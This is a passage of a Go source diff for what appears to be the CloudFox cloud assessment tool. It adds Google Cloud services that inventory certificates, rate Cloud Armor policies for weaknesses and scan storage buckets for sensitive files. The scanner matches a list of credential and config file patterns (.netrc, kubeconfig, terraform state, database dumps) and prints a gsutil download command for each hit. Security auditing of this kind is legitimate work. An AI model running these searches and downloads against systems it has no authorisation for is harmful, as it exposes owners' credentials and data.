Category: "Secret", RiskLevel: "HIGH", Description: "Authentication file"}, + {Pattern: ".htpasswd", Category: "Secret", RiskLevel: "HIGH", Description: "HTTP password file"}, + {Pattern: ".netrc", Category: "Secret", RiskLevel: "HIGH", Description: "FTP/other credentials"}, + + // Config files - HIGH/MEDIUM + {Pattern: "config", Category: "Config", RiskLevel: "MEDIUM", Description: "Configuration file"}, + {Pattern: ".yaml", Category: "Config", RiskLevel: "MEDIUM", Description: "YAML config (may contain secrets)"}, + {Pattern: ".yml", Category: "Config", RiskLevel: "MEDIUM", Description: "YAML config (may contain secrets)"}, + {Pattern: "application.properties", Category: "Config", RiskLevel: "HIGH", Description: "Java app config"}, + {Pattern: "web.config", Category: "Config", RiskLevel: "HIGH", Description: ".NET config"}, + {Pattern: "appsettings.json", Category: "Config", RiskLevel: "HIGH", Description: ".NET app settings"}, + {Pattern: "settings.py", Category: "Config", RiskLevel: "HIGH", Description: "Django settings"}, + {Pattern: "database.yml", Category: "Config", RiskLevel: "HIGH", Description: "Rails database config"}, + {Pattern: "wp-config.php", Category: "Config", RiskLevel: "HIGH", Description: "WordPress config"}, + {Pattern: ".npmrc", Category: "Config", RiskLevel: "HIGH", Description: "NPM config (may contain tokens)"}, + {Pattern: ".dockercfg", Category: "Config", RiskLevel: "HIGH", Description: "Docker registry credentials"}, + {Pattern: "docker-compose", Category: "Config", RiskLevel: "MEDIUM", Description: "Docker compose config"}, + {Pattern: "terraform.tfstate", Category: "Config", RiskLevel: "CRITICAL", Description: "Terraform state (contains secrets)"}, + {Pattern: ".tfstate", Category: "Config", RiskLevel: "CRITICAL", Description: "Terraform state file"}, + {Pattern: "terraform.tfvars", Category: "Config", RiskLevel: "HIGH", Description: "Terraform variables"}, + {Pattern: "kubeconfig", Category: "Config", RiskLevel: "CRITICAL", Description: "Kubernetes config"}, + {Pattern: ".kube/config", Category: "Config", RiskLevel: "CRITICAL", Description: "Kubernetes config"}, + + // Backups - HIGH + {Pattern: ".sql", Category: "Backup", RiskLevel: "HIGH", Description: "SQL database dump"}, + {Pattern: ".dump", Category: "Backup", RiskLevel: "HIGH", Description: "Database dump"}, + {Pattern: ".bak", Category: "Backup", RiskLevel: "MEDIUM", Description: "Backup file"}, + {Pattern: "backup", Category: "Backup", RiskLevel: "MEDIUM", Description: "Backup file/directory"}, + {Pattern: ".tar.gz", Category: "Backup", RiskLevel: "MEDIUM", Description: "Compressed archive"}, + {Pattern: ".zip", Category: "Backup", RiskLevel: "MEDIUM", Description: "ZIP archive"}, + + // Source code - MEDIUM + {Pattern: ".git", Category: "Source", RiskLevel: "MEDIUM", Description: "Git repository data"}, + {Pattern: "source", Category: "Source", RiskLevel: "LOW", Description: "Source code"}, + + // Logs - LOW (but may contain sensitive data) + {Pattern: ".log", Category: "Log", RiskLevel: "LOW", Description: "Log file (may contain sensitive data)"}, + {Pattern: "access.log", Category: "Log", RiskLevel: "MEDIUM", Description: "Access log"}, + {Pattern: "error.log", Category: "Log", RiskLevel: "MEDIUM", Description: "Error log"}, + + // Cloud-specific + {Pattern: "cloudfunctions", Category: "Cloud", RiskLevel: "MEDIUM", Description: "Cloud Functions source"}, + {Pattern: "gcf-sources", Category: "Cloud", RiskLevel: "MEDIUM", Description: "Cloud Functions source bucket"}, + {Pattern: "cloud-build", Category: "Cloud", RiskLevel: "MEDIUM", Description: "Cloud Build artifacts"}, + {Pattern: "artifacts", Category: "Cloud", RiskLevel: "LOW", Description: "Build artifacts"}, + } +} + +// EnumerateBucketSensitiveFiles lists potentially sensitive files in a bucket +func (s *BucketEnumService) EnumerateBucketSensitiveFiles(bucketName, projectID string, maxObjects int) ([]SensitiveFileInfo, error) { + ctx := context.Background() + var storageService *storage.Service + var err error + + if s.session != nil { + storageService, err = storage.NewService(ctx, s.session.GetClientOption()) + } else { + storageService, err = storage.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "storage.googleapis.com") + } + + var sensitiveFiles []SensitiveFileInfo + patterns := GetSensitivePatterns() + + // List objects in the bucket + req := storageService.Objects.List(bucketName) + if maxObjects > 0 { + req = req.MaxResults(int64(maxObjects)) + } + + err = req.Pages(ctx, func(objects *storage.Objects) error { + for _, obj := range objects.Items { + // Check against sensitive patterns + if info := s.checkObjectSensitivity(obj, bucketName, projectID, patterns); info != nil { + sensitiveFiles = append(sensitiveFiles, *info) + } + } + return nil + }) + + if err != nil && err != iterator.Done { + return nil, gcpinternal.ParseGCPError(err, "storage.googleapis.com") + } + + return sensitiveFiles, nil +} + +func (s *BucketEnumService) checkObjectSensitivity(obj *storage.Object, bucketName, projectID string, patterns []SensitivePattern) *SensitiveFileInfo { + if obj == nil { + return nil + } + + name := strings.ToLower(obj.Name) + ext := strings.ToLower(filepath.Ext(obj.Name)) + baseName := strings.ToLower(filepath.Base(obj.Name)) + + // Check each pattern + for _, pattern := range patterns { + matched := false + patternLower := strings.ToLower(pattern.Pattern) + + // Check extension match + if strings.HasPrefix(patternLower, ".") && ext == patternLower { + matched = true + } + // Check name contains pattern + if strings.Contains(name, patternLower) { + matched = true + } + // Check base name match + if strings.Contains(baseName, patternLower) { + matched = true + } + + if matched { + // Additional filtering for common false positives + if s.isFalsePositive(obj.Name, pattern) { + continue + } + + // Check if object has public access via ACLs + isPublic := s.isObjectPublic(obj) + + return &SensitiveFileInfo{ + BucketName: bucketName, + ObjectName: obj.Name, + ProjectID: projectID, + Size: int64(obj.Size), + ContentType: obj.ContentType, + Category: pattern.Category, + RiskLevel: pattern.RiskLevel, + Description: pattern.Description, + DownloadCmd: fmt.Sprintf("gsutil cp gs://%s/%s .", bucketName, obj.Name), + Updated: obj.Updated, + StorageClass: obj.StorageClass, + IsPublic: isPublic, + } + } + } + + return nil +} + +// isObjectPublic checks if an object has public access via ACLs +func (s *BucketEnumService) isObjectPublic(obj *storage.Object) bool { + if obj == nil || obj.Acl == nil { + return false + } + + for _, acl := range obj.Acl { + // Check for public access entities + if acl.Entity == "allUsers" || acl.Entity == "allAuthenticatedUsers" { + return true + } + } + + return false +} + +func (s *BucketEnumService) isFalsePositive(objectName string, pattern SensitivePattern) bool { + nameLower := strings.ToLower(objectName) + + // Filter out common false positives + falsePositivePaths := []string{ + "node_modules/", + "vendor/", + ".git/objects/", + "__pycache__/", + "dist/", + "build/", + } + + for _, fp := range falsePositivePaths { + if strings.Contains(nameLower, fp) { + return true + } + } + + // JSON files that are likely not credentials + if pattern.Pattern == ".json" { + // Only flag if it looks like a service account or credential + if !strings.Contains(nameLower, "service") && + !strings.Contains(nameLower, "account") && + !strings.Contains(nameLower, "credential") && + !strings.Contains(nameLower, "key") && + !strings.Contains(nameLower, "secret") && + !strings.Contains(nameLower, "auth") { + return true + } + } + + // Filter very small files (likely empty or not useful) + // This would need to be checked at the object level + + return false +} + +// GetBucketsList lists all buckets in a project +func (s *BucketEnumService) GetBucketsList(projectID string) ([]string, error) { + ctx := context.Background() + var storageService *storage.Service + var err error + + if s.session != nil { + storageService, err = storage.NewService(ctx, s.session.GetClientOption()) + } else { + storageService, err = storage.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "storage.googleapis.com") + } + + var buckets []string + err = storageService.Buckets.List(projectID).Pages(ctx, func(bucketList *storage.Buckets) error { + for _, bucket := range bucketList.Items { + buckets = append(buckets, bucket.Name) + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "storage.googleapis.com") + } + + return buckets, nil +} diff --git a/gcp/services/certManagerService/certManagerService.go b/gcp/services/certManagerService/certManagerService.go new file mode 100644 index 00000000..0286aa00 --- /dev/null +++ b/gcp/services/certManagerService/certManagerService.go @@ -0,0 +1,272 @@ +package certmanagerservice + +import ( + "context" + "fmt" + "strings" + "time" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + certificatemanager "google.golang.org/api/certificatemanager/v1" + compute "google.golang.org/api/compute/v1" +) + +type CertManagerService struct{} + +func New() *CertManagerService { + return &CertManagerService{} +} + +// Certificate represents an SSL/TLS certificate +type Certificate struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Location string `json:"location"` + Type string `json:"type"` // SELF_MANAGED, GOOGLE_MANAGED + Domains []string `json:"domains"` + ExpireTime string `json:"expireTime"` + DaysUntilExpiry int `json:"daysUntilExpiry"` + State string `json:"state"` + IssuanceState string `json:"issuanceState"` + AttachedTo []string `json:"attachedTo"` // LBs or other resources + Wildcard bool `json:"wildcard"` + Expired bool `json:"expired"` + SelfManaged bool `json:"selfManaged"` +} + +// SSLCertificate represents a compute SSL certificate (classic) +type SSLCertificate struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Type string `json:"type"` // SELF_MANAGED, MANAGED + Domains []string `json:"domains"` + ExpireTime string `json:"expireTime"` + DaysUntilExpiry int `json:"daysUntilExpiry"` + CreationTime string `json:"creationTime"` + Wildcard bool `json:"wildcard"` + Expired bool `json:"expired"` + SelfManaged bool `json:"selfManaged"` +} + +// CertificateMap represents a Certificate Manager certificate map +type CertificateMap struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Location string `json:"location"` + EntryCount int `json:"entryCount"` + Certificates []string `json:"certificates"` +} + +// GetCertificates retrieves Certificate Manager certificates +func (s *CertManagerService) GetCertificates(projectID string) ([]Certificate, error) { + ctx := context.Background() + service, err := certificatemanager.NewService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "certificatemanager.googleapis.com") + } + + var certificates []Certificate + + // List certificates in all locations (global and regional) + locations := []string{"global"} + + for _, location := range locations { + parent := fmt.Sprintf("projects/%s/locations/%s", projectID, location) + resp, err := service.Projects.Locations.Certificates.List(parent).Context(ctx).Do() + if err != nil { + continue // May not have permissions or no certificates + } + + for _, cert := range resp.Certificates { + c := Certificate{ + Name: extractNameFromPath(cert.Name), + ProjectID: projectID, + Location: location, + Domains: cert.SanDnsnames, + } + + // Determine type and state + if cert.Managed != nil { + c.Type = "GOOGLE_MANAGED" + c.State = cert.Managed.State + c.IssuanceState = cert.Managed.State + } else if cert.SelfManaged != nil { + c.Type = "SELF_MANAGED" + c.State = "ACTIVE" // Self-managed certs are active if they exist + c.SelfManaged = true + } + + // Parse expiration + if cert.ExpireTime != "" { + c.ExpireTime = cert.ExpireTime + expTime, err := time.Parse(time.RFC3339, cert.ExpireTime) + if err == nil { + c.DaysUntilExpiry = int(time.Until(expTime).Hours() / 24) + c.Expired = c.DaysUntilExpiry < 0 + } + } + + // Check for wildcard domains + for _, domain := range c.Domains { + if strings.HasPrefix(domain, "*") { + c.Wildcard = true + break + } + } + + certificates = append(certificates, c) + } + } + + return certificates, nil +} + +// GetSSLCertificates retrieves classic Compute Engine SSL certificates +func (s *CertManagerService) GetSSLCertificates(projectID string) ([]SSLCertificate, error) { + ctx := context.Background() + service, err := compute.NewService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + var certificates []SSLCertificate + + // Global SSL certificates + resp, err := service.SslCertificates.List(projectID).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + for _, cert := range resp.Items { + c := SSLCertificate{ + Name: cert.Name, + ProjectID: projectID, + Type: cert.Type, + CreationTime: cert.CreationTimestamp, + SelfManaged: cert.Type == "SELF_MANAGED", + } + + // Get domains from managed certificate + if cert.Managed != nil { + c.Domains = cert.Managed.Domains + } + + // Parse expiration + if cert.ExpireTime != "" { + c.ExpireTime = cert.ExpireTime + expTime, err := time.Parse(time.RFC3339, cert.ExpireTime) + if err == nil { + c.DaysUntilExpiry = int(time.Until(expTime).Hours() / 24) + c.Expired = c.DaysUntilExpiry < 0 + } + } + + // Check for wildcard domains + for _, domain := range c.Domains { + if strings.HasPrefix(domain, "*") { + c.Wildcard = true + break + } + } + + certificates = append(certificates, c) + } + + // Regional SSL certificates + regionsResp, err := service.Regions.List(projectID).Context(ctx).Do() + if err == nil { + for _, region := range regionsResp.Items { + regionalCerts, err := service.RegionSslCertificates.List(projectID, region.Name).Context(ctx).Do() + if err != nil { + continue + } + + for _, cert := range regionalCerts.Items { + c := SSLCertificate{ + Name: fmt.Sprintf("%s (%s)", cert.Name, region.Name), + ProjectID: projectID, + Type: cert.Type, + CreationTime: cert.CreationTimestamp, + SelfManaged: cert.Type == "SELF_MANAGED", + } + + if cert.Managed != nil { + c.Domains = cert.Managed.Domains + } + + if cert.ExpireTime != "" { + c.ExpireTime = cert.ExpireTime + expTime, err := time.Parse(time.RFC3339, cert.ExpireTime) + if err == nil { + c.DaysUntilExpiry = int(time.Until(expTime).Hours() / 24) + c.Expired = c.DaysUntilExpiry < 0 + } + } + + // Check for wildcard domains + for _, domain := range c.Domains { + if strings.HasPrefix(domain, "*") { + c.Wildcard = true + break + } + } + + certificates = append(certificates, c) + } + } + } + + return certificates, nil +} + +// GetCertificateMaps retrieves certificate maps +func (s *CertManagerService) GetCertificateMaps(projectID string) ([]CertificateMap, error) { + ctx := context.Background() + service, err := certificatemanager.NewService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "certificatemanager.googleapis.com") + } + + var maps []CertificateMap + + locations := []string{"global"} + + for _, location := range locations { + parent := fmt.Sprintf("projects/%s/locations/%s", projectID, location) + resp, err := service.Projects.Locations.CertificateMaps.List(parent).Context(ctx).Do() + if err != nil { + continue + } + + for _, certMap := range resp.CertificateMaps { + cm := CertificateMap{ + Name: extractNameFromPath(certMap.Name), + ProjectID: projectID, + Location: location, + } + + // Get entries for this map + entriesResp, err := service.Projects.Locations.CertificateMaps.CertificateMapEntries.List(certMap.Name).Context(ctx).Do() + if err == nil { + cm.EntryCount = len(entriesResp.CertificateMapEntries) + for _, entry := range entriesResp.CertificateMapEntries { + for _, certRef := range entry.Certificates { + cm.Certificates = append(cm.Certificates, extractNameFromPath(certRef)) + } + } + } + + maps = append(maps, cm) + } + } + + return maps, nil +} + +func extractNameFromPath(path string) string { + parts := strings.Split(path, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return path +} diff --git a/gcp/services/cloudArmorService/cloudArmorService.go b/gcp/services/cloudArmorService/cloudArmorService.go new file mode 100644 index 00000000..473d8fc9 --- /dev/null +++ b/gcp/services/cloudArmorService/cloudArmorService.go @@ -0,0 +1,244 @@ +package cloudarmorservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + compute "google.golang.org/api/compute/v1" +) + +type CloudArmorService struct{} + +func New() *CloudArmorService { + return &CloudArmorService{} +} + +// SecurityPolicy represents a Cloud Armor security policy +type SecurityPolicy struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Description string `json:"description"` + Type string `json:"type"` // CLOUD_ARMOR, CLOUD_ARMOR_EDGE, CLOUD_ARMOR_NETWORK + RuleCount int `json:"ruleCount"` + Rules []SecurityRule `json:"rules"` + AdaptiveProtection bool `json:"adaptiveProtection"` + DDOSProtection string `json:"ddosProtection"` + AttachedResources []string `json:"attachedResources"` + Weaknesses []string `json:"weaknesses"` +} + +// SecurityRule represents a rule within a security policy +type SecurityRule struct { + Priority int64 `json:"priority"` + Description string `json:"description"` + Action string `json:"action"` // allow, deny, redirect, rate_based_ban, throttle + Match string `json:"match"` // Simplified match expression + Preview bool `json:"preview"` + RateLimitConfig *RateLimitInfo `json:"rateLimitConfig,omitempty"` +} + +// RateLimitInfo contains rate limiting configuration +type RateLimitInfo struct { + ThresholdCount int64 `json:"thresholdCount"` + IntervalSec int64 `json:"intervalSec"` + ExceedAction string `json:"exceedAction"` +} + +// GetSecurityPolicies retrieves all Cloud Armor security policies +func (s *CloudArmorService) GetSecurityPolicies(projectID string) ([]SecurityPolicy, error) { + ctx := context.Background() + service, err := compute.NewService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + var policies []SecurityPolicy + + // List security policies + resp, err := service.SecurityPolicies.List(projectID).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + for _, policy := range resp.Items { + sp := SecurityPolicy{ + Name: policy.Name, + ProjectID: projectID, + Description: policy.Description, + Type: policy.Type, + RuleCount: len(policy.Rules), + Rules: []SecurityRule{}, + AttachedResources: []string{}, + Weaknesses: []string{}, + } + + // Check adaptive protection + if policy.AdaptiveProtectionConfig != nil && + policy.AdaptiveProtectionConfig.Layer7DdosDefenseConfig != nil { + sp.AdaptiveProtection = policy.AdaptiveProtectionConfig.Layer7DdosDefenseConfig.Enable + } + + // Check DDoS protection + if policy.DdosProtectionConfig != nil { + sp.DDOSProtection = policy.DdosProtectionConfig.DdosProtection + } + + // Parse rules + for _, rule := range policy.Rules { + sr := SecurityRule{ + Priority: rule.Priority, + Description: rule.Description, + Action: rule.Action, + Preview: rule.Preview, + } + + // Parse match expression + if rule.Match != nil { + if rule.Match.Expr != nil { + sr.Match = rule.Match.Expr.Expression + } else if rule.Match.VersionedExpr != "" { + sr.Match = rule.Match.VersionedExpr + } else if rule.Match.Config != nil { + // Source IP ranges + if len(rule.Match.Config.SrcIpRanges) > 0 { + sr.Match = fmt.Sprintf("srcIpRanges: %s", strings.Join(rule.Match.Config.SrcIpRanges, ", ")) + } + } + } + + // Rate limit config + if rule.RateLimitOptions != nil { + sr.RateLimitConfig = &RateLimitInfo{ + ExceedAction: rule.RateLimitOptions.ExceedAction, + } + if rule.RateLimitOptions.RateLimitThreshold != nil { + sr.RateLimitConfig.ThresholdCount = rule.RateLimitOptions.RateLimitThreshold.Count + sr.RateLimitConfig.IntervalSec = rule.RateLimitOptions.RateLimitThreshold.IntervalSec + } + } + + sp.Rules = append(sp.Rules, sr) + } + + // Find attached resources (backend services using this policy) + sp.AttachedResources = s.findAttachedResources(ctx, service, projectID, policy.Name) + + // Analyze for weaknesses + sp.Weaknesses = s.analyzePolicy(sp) + + policies = append(policies, sp) + } + + return policies, nil +} + +// findAttachedResources finds backend services using this security policy +func (s *CloudArmorService) findAttachedResources(ctx context.Context, service *compute.Service, projectID, policyName string) []string { + var resources []string + + // Check backend services + backendServices, err := service.BackendServices.List(projectID).Context(ctx).Do() + if err == nil { + for _, bs := range backendServices.Items { + if bs.SecurityPolicy != "" && strings.HasSuffix(bs.SecurityPolicy, "/"+policyName) { + resources = append(resources, fmt.Sprintf("backend-service:%s", bs.Name)) + } + } + } + + return resources +} + +// analyzePolicy checks for security weaknesses in the policy +func (s *CloudArmorService) analyzePolicy(policy SecurityPolicy) []string { + var weaknesses []string + + // Check if policy is attached to anything + if len(policy.AttachedResources) == 0 { + weaknesses = append(weaknesses, "Policy not attached to any backend service") + } + + // Check for overly permissive rules + hasDefaultAllow := false + hasDenyRules := false + previewOnlyCount := 0 + allowAllIPsCount := 0 + + for _, rule := range policy.Rules { + if rule.Priority == 2147483647 && rule.Action == "allow" { + hasDefaultAllow = true + } + if strings.HasPrefix(rule.Action, "deny") { + hasDenyRules = true + } + if rule.Preview { + previewOnlyCount++ + } + // Check for allow rules that match all IPs + if rule.Action == "allow" && (rule.Match == "*" || rule.Match == "srcIpRanges: *" || + strings.Contains(rule.Match, "0.0.0.0/0") || rule.Match == "true") { + allowAllIPsCount++ + } + } + + if hasDefaultAllow && !hasDenyRules { + weaknesses = append(weaknesses, "Default allow rule with no deny rules") + } + + if previewOnlyCount > 0 { + weaknesses = append(weaknesses, fmt.Sprintf("%d rule(s) in preview mode", previewOnlyCount)) + } + + if allowAllIPsCount > 0 && !hasDenyRules { + weaknesses = append(weaknesses, "Has allow-all rules without deny rules") + } + + // Check adaptive protection + if !policy.AdaptiveProtection { + weaknesses = append(weaknesses, "Adaptive protection not enabled") + } + + // Check for common WAF rules + hasOWASPRules := false + for _, rule := range policy.Rules { + matchLower := strings.ToLower(rule.Match) + if strings.Contains(matchLower, "sqli") || strings.Contains(matchLower, "xss") || + strings.Contains(matchLower, "rce") || strings.Contains(matchLower, "lfi") { + hasOWASPRules = true + break + } + } + + if !hasOWASPRules { + weaknesses = append(weaknesses, "No OWASP/WAF rules detected") + } + + return weaknesses +} + +// GetUnprotectedLoadBalancers finds load balancers without Cloud Armor protection +func (s *CloudArmorService) GetUnprotectedLoadBalancers(projectID string) ([]string, error) { + ctx := context.Background() + service, err := compute.NewService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + var unprotected []string + + // Get all backend services + backendServices, err := service.BackendServices.List(projectID).Context(ctx).Do() + if err != nil { + return nil, err + } + + for _, bs := range backendServices.Items { + if bs.SecurityPolicy == "" { + unprotected = append(unprotected, bs.Name) + } + } + + return unprotected, nil +} diff --git a/gcp/services/cloudStorageService/cloudStorageService.go b/gcp/services/cloudStorageService/cloudStorageService.go index c91f071a..e62fa8df 100644 --- a/gcp/services/cloudStorageService/cloudStorageService.go +++ b/gcp/services/cloudStorageService/cloudStorageService.go @@ -3,38 +3,117 @@ package cloudstorageservice import ( "context" "fmt" + "strings" + "time" + "cloud.google.com/go/iam" "cloud.google.com/go/storage" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "google.golang.org/api/iterator" + "google.golang.org/api/option" + storageapi "google.golang.org/api/storage/v1" ) type CloudStorageService struct { - // DataStoreService datastoreservice.DataStoreService + client *storage.Client + session *gcpinternal.SafeSession } +// New creates a new CloudStorageService (legacy - uses ADC directly) func New() *CloudStorageService { return &CloudStorageService{} } -// type ObjectInfo struct { -// ObjectName string `json:"objecttName"` -// ObjectSizeBytes float64 `json:"objectSizeBytes"` -// IsPublic bool `json:"isPublic"` -// } +// NewWithSession creates a CloudStorageService with a SafeSession for managed authentication +func NewWithSession(session *gcpinternal.SafeSession) *CloudStorageService { + return &CloudStorageService{session: session} +} + +// NewWithClient creates a CloudStorageService with an existing client (for reuse) +func NewWithClient(client *storage.Client) *CloudStorageService { + return &CloudStorageService{client: client} +} + +// IAMBinding represents a single IAM binding on a bucket +type IAMBinding struct { + Role string `json:"role"` + Members []string `json:"members"` +} + +// LifecycleRule represents a single lifecycle rule on a bucket +type LifecycleRule struct { + Action string `json:"action"` // Delete, SetStorageClass, AbortIncompleteMultipartUpload + StorageClass string `json:"storageClass"` // Target storage class (for SetStorageClass) + AgeDays int64 `json:"ageDays"` // Age condition in days + NumVersions int64 `json:"numVersions"` // Number of newer versions condition + IsLive *bool `json:"isLive"` // Whether object is live (vs archived) + MatchesPrefix string `json:"matchesPrefix"` // Object name prefix match + MatchesSuffix string `json:"matchesSuffix"` // Object name suffix match + MatchesStorage string `json:"matchesStorage"` // Storage class match + CreatedBefore string `json:"createdBefore"` // Created before date condition + DaysSinceCustom int64 `json:"daysSinceCustom"` // Days since custom time + DaysSinceNoncurrent int64 `json:"daysSinceNoncurrent"` // Days since became noncurrent +} +// BucketInfo contains bucket metadata and security-relevant configuration type BucketInfo struct { + // Basic info Name string `json:"name"` Location string `json:"location"` ProjectID string `json:"projectID"` + + // Security-relevant fields + PublicAccessPrevention string `json:"publicAccessPrevention"` // "enforced", "inherited", or "unspecified" + UniformBucketLevelAccess bool `json:"uniformBucketLevelAccess"` // true = IAM only, no ACLs + VersioningEnabled bool `json:"versioningEnabled"` // Object versioning + RequesterPays bool `json:"requesterPays"` // Requester pays enabled + DefaultEventBasedHold bool `json:"defaultEventBasedHold"` // Event-based hold on new objects + LoggingEnabled bool `json:"loggingEnabled"` // Access logging enabled + LogBucket string `json:"logBucket"` // Destination bucket for logs + EncryptionType string `json:"encryptionType"` // "Google-managed", "CMEK", or "CSEK" + KMSKeyName string `json:"kmsKeyName"` // KMS key for CMEK + RetentionPolicyEnabled bool `json:"retentionPolicyEnabled"` // Retention policy set + RetentionPeriodDays int64 `json:"retentionPeriodDays"` // Retention period in days + RetentionPolicyLocked bool `json:"retentionPolicyLocked"` // Retention policy is locked (immutable) + SoftDeleteEnabled bool `json:"softDeleteEnabled"` // Soft delete policy enabled + SoftDeleteRetentionDays int64 `json:"softDeleteRetentionDays"` // Soft delete retention in days + StorageClass string `json:"storageClass"` // Default storage class + AutoclassEnabled bool `json:"autoclassEnabled"` // Autoclass feature enabled + AutoclassTerminalClass string `json:"autoclassTerminalClass"` // Terminal storage class for autoclass + + // Lifecycle configuration + LifecycleEnabled bool `json:"lifecycleEnabled"` // Has lifecycle rules + LifecycleRuleCount int `json:"lifecycleRuleCount"` // Number of lifecycle rules + LifecycleRules []LifecycleRule `json:"lifecycleRules"` // Parsed lifecycle rules + HasDeleteRule bool `json:"hasDeleteRule"` // Has a delete action rule + HasArchiveRule bool `json:"hasArchiveRule"` // Has a storage class transition rule + ShortestDeleteDays int64 `json:"shortestDeleteDays"` // Shortest delete age in days + TurboReplication bool `json:"turboReplication"` // Turbo replication enabled (dual-region) + LocationType string `json:"locationType"` // "region", "dual-region", or "multi-region" + + // Public access indicators + IsPublic bool `json:"isPublic"` // Has allUsers or allAuthenticatedUsers + PublicAccess string `json:"publicAccess"` // "None", "allUsers", "allAuthenticatedUsers", or "Both" + + // IAM Policy + IAMBindings []IAMBinding `json:"iamBindings"` // IAM policy bindings on the bucket + + // Timestamps + Created string `json:"created"` + Updated string `json:"updated"` } func (cs *CloudStorageService) Buckets(projectID string) ([]BucketInfo, error) { ctx := context.Background() - client, err := storage.NewClient(ctx) + + // Get or create client + client, closeClient, err := cs.getClient(ctx) if err != nil { - return nil, fmt.Errorf("Failed to create client: %v", err) + return nil, err + } + if closeClient { + defer client.Close() } - defer client.Close() var buckets []BucketInfo bucketIterator := client.Buckets(ctx, projectID) @@ -46,72 +125,313 @@ func (cs *CloudStorageService) Buckets(projectID string) ([]BucketInfo, error) { if err != nil { return nil, err } - bucket := BucketInfo{Name: battrs.Name, Location: battrs.Location, ProjectID: projectID} + + bucket := BucketInfo{ + Name: battrs.Name, + Location: battrs.Location, + ProjectID: projectID, + } + + // Security fields + bucket.PublicAccessPrevention = publicAccessPreventionToString(battrs.PublicAccessPrevention) + bucket.UniformBucketLevelAccess = battrs.UniformBucketLevelAccess.Enabled + bucket.VersioningEnabled = battrs.VersioningEnabled + bucket.RequesterPays = battrs.RequesterPays + bucket.DefaultEventBasedHold = battrs.DefaultEventBasedHold + bucket.StorageClass = battrs.StorageClass + + // Logging + if battrs.Logging != nil { + bucket.LoggingEnabled = battrs.Logging.LogBucket != "" + bucket.LogBucket = battrs.Logging.LogBucket + } + + // Encryption + if battrs.Encryption != nil && battrs.Encryption.DefaultKMSKeyName != "" { + bucket.EncryptionType = "CMEK" + bucket.KMSKeyName = battrs.Encryption.DefaultKMSKeyName + } else { + bucket.EncryptionType = "Google-managed" + } + + // Retention Policy + if battrs.RetentionPolicy != nil { + bucket.RetentionPolicyEnabled = true + bucket.RetentionPeriodDays = int64(battrs.RetentionPolicy.RetentionPeriod.Hours() / 24) + bucket.RetentionPolicyLocked = battrs.RetentionPolicy.IsLocked + } + + // Autoclass + if battrs.Autoclass != nil && battrs.Autoclass.Enabled { + bucket.AutoclassEnabled = true + bucket.AutoclassTerminalClass = battrs.Autoclass.TerminalStorageClass + } + + // Timestamps + if !battrs.Created.IsZero() { + bucket.Created = battrs.Created.Format("2006-01-02") + } + + // Get additional fields via REST API (SoftDeletePolicy, Updated) + cs.enrichBucketFromRestAPI(ctx, &bucket) + + // Get IAM policy for the bucket + iamBindings, isPublic, publicAccess := cs.getBucketIAMPolicy(ctx, client, battrs.Name) + bucket.IAMBindings = iamBindings + bucket.IsPublic = isPublic + bucket.PublicAccess = publicAccess + buckets = append(buckets, bucket) } return buckets, nil } -// func (cs *CloudStorageService) BucketsWithMetaData(projectID string) (map[string][]BucketInfo, error) { -// buckets, _ := cs.Buckets(projectID) -// bucketInfos := make(map[string][]BucketInfo) -// ctx := context.Background() -// client, err := storage.NewClient(ctx) -// if err != nil { -// return nil, fmt.Errorf("Failed to create client: %v", err) -// } -// for { -// bucketAttrs, err := buckets.Next() -// if err == iterator.Done { -// break -// } -// if err != nil { -// return nil, fmt.Errorf("failed to list buckets: %v", err) -// } - -// bucketName := bucketAttrs.Name -// log.Printf("Working on bucket %s", bucketName) - -// // List all objects in the bucket and calculate total size -// totalSize := int64(0) -// var objects []ObjectInfo -// it := client.Bucket(bucketName).Objects(ctx, nil) -// for { -// objectAttrs, err := it.Next() -// if err == iterator.Done { -// break -// } -// if err != nil { -// return nil, fmt.Errorf("failed to list objects in bucket %s: %v", bucketName, err) -// } - -// // Get size -// objectSize := objectAttrs.Size -// totalSize += objectSize - -// // Check if public -// isPublic := false -// for _, rule := range objectAttrs.ACL { -// if rule.Entity == storage.AllUsers { -// isPublic = true -// break -// } -// } - -// objects = append(objects, ObjectInfo{ObjectName: objectAttrs.Name, ObjectSizeBytes: float64(objectSize), IsPublic: isPublic}) - -// if totalSize > 3221225472 { // 3 GiB in bytes -// log.Printf("%s bucket is over 3 GiB. Skipping remaining objects in this bucket...", bucketName) -// break -// } -// } -// bucketSizeMB := float64(totalSize) / 1024 / 1024 -// bucketInfos[projectID] = append(bucketInfos[projectID], BucketInfo{BucketName: bucketName, BucketSizeMB: bucketSizeMB, Objects: objects}) -// } -// log.Printf("Sorting resulting list of buckets in descending order %s", projectID) -// sort.Slice(bucketInfos[projectID], func(i, j int) bool { -// return bucketInfos[projectID][i].BucketSizeMB > bucketInfos[projectID][j].BucketSizeMB -// }) - -// return bucketInfos, nil -// } +// getClient returns a storage client, using session if available +// Returns the client, whether to close it, and any error +func (cs *CloudStorageService) getClient(ctx context.Context) (*storage.Client, bool, error) { + // If we have an existing client, use it + if cs.client != nil { + return cs.client, false, nil + } + + // If we have a session, use its token source + if cs.session != nil { + client, err := storage.NewClient(ctx, cs.session.GetClientOption()) + if err != nil { + return nil, false, fmt.Errorf("failed to create client with session: %v", err) + } + return client, true, nil + } + + // Fall back to ADC + client, err := 